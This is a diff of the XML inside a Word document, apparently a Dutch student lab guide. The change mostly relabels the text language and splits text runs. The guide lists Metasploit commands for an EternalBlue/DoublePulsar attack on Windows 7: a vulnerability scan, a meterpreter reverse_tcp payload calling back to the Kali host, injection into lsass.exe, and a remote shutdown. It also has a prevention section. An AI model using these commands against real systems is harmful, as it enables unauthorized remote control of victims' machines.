-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ebruikt wordt bekijkt of een target machine kwetsbaar is voor onze </w:t>
+        <w:t xml:space="preserve">De scanner die hierna gebruikt wordt bekijkt of een target machine kwetsbaar is voor onze </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2498,23 +2480,51 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>use auxiliary/scanner/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>use</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>auxiliary</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>/scanner/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>smb</w:t>
       </w:r>
@@ -2523,7 +2533,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>/smb_ms17_010</w:t>
       </w:r>
@@ -2538,14 +2548,14 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>set RHOSTS &lt;Windows IP&gt;</w:t>
       </w:r>
@@ -2560,14 +2570,14 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>run</w:t>
       </w:r>
@@ -2580,15 +2590,17 @@
           <w:numId w:val="4"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Exploit</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2598,18 +2610,34 @@
           <w:numId w:val="4"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Configure payload</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Configure</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
@@ -2624,23 +2652,69 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>use payload/windows/x64/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>use</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>windows</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>/x64/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>meterpreter</w:t>
       </w:r>
@@ -2649,7 +2723,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
@@ -2658,7 +2732,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>reverse_tcp</w:t>
       </w:r>
@@ -2674,14 +2748,14 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>info</w:t>
       </w:r>
@@ -2696,14 +2770,14 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>set LHOST &lt;Kali IP&gt;</w:t>
       </w:r>
@@ -2716,15 +2790,31 @@
           <w:numId w:val="4"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Configure Exploit</w:t>
-      </w:r>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Configure</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2736,23 +2826,69 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>use exploit/windows/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>use</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>windows</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>smb</w:t>
       </w:r>
@@ -2761,7 +2897,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
@@ -2770,7 +2906,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>eternalblue_doublepulsar</w:t>
       </w:r>
@@ -2786,23 +2922,77 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>set payload payload/windows/x64/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>windows</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>/x64/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>meterpreter</w:t>
       </w:r>
@@ -2811,7 +3001,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
@@ -2820,7 +3010,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>reverse_tcp</w:t>
       </w:r>
@@ -2836,14 +3026,14 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>info</w:t>
       </w:r>
@@ -2858,14 +3048,14 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>set TARGET 8 (Windows 7)</w:t>
       </w:r>
@@ -2880,23 +3070,41 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">set RHOSTS &lt;windows </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>set RHOSTS &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>windows</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>ip</w:t>
       </w:r>
@@ -2905,7 +3113,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>&gt;</w:t>
       </w:r>
@@ -2920,14 +3128,14 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve">set LHOST &lt;kali </w:t>
       </w:r>
@@ -2936,7 +3144,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>ip</w:t>
       </w:r>
@@ -2945,7 +3153,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>&gt;</w:t>
       </w:r>
@@ -2960,14 +3168,14 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>set TARGETARCHITECTURE x64</w:t>
       </w:r>
@@ -2982,14 +3190,14 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>set PROCESSINJECT lsass.exe</w:t>
       </w:r>
@@ -3004,14 +3212,14 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>set DOUBLEPULSARPATH /home/osboxes/EternalBlue/Eternalblue-Doublepulsar-Metasploit/deps/</w:t>
       </w:r>
@@ -3026,14 +3234,14 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>set ETERNALBLUEPATH /home/osboxes/EternalBlue/Eternalblue-Doublepulsar-Metasploit/deps/</w:t>
       </w:r>
@@ -3048,14 +3256,14 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>set WINEPATH /home/</w:t>
       </w:r>
@@ -3064,26 +3272,34 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>osboxes</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>/.wine</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>/.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>wine</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
@@ -3092,7 +3308,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>drive_c</w:t>
       </w:r>
@@ -3101,7 +3317,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
@@ -3114,20 +3330,28 @@
           <w:numId w:val="4"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve">Run </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>exploit.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3140,14 +3364,14 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>run</w:t>
       </w:r>
@@ -3160,30 +3384,32 @@
           <w:numId w:val="4"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Shut</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>down Windows</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
@@ -3198,16 +3424,26 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>shutdown /s</w:t>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>shutdown</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /s</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3217,12 +3453,12 @@
           <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
@@ -3231,29 +3467,29 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Hoe de exploit </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>voorkomen</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>?</w:t>
+        <w:t xml:space="preserve">Hoe de </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> voorkomen?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3446,14 +3682,22 @@
           <w:numId w:val="11"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Add required architecture for wine32</w:t>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
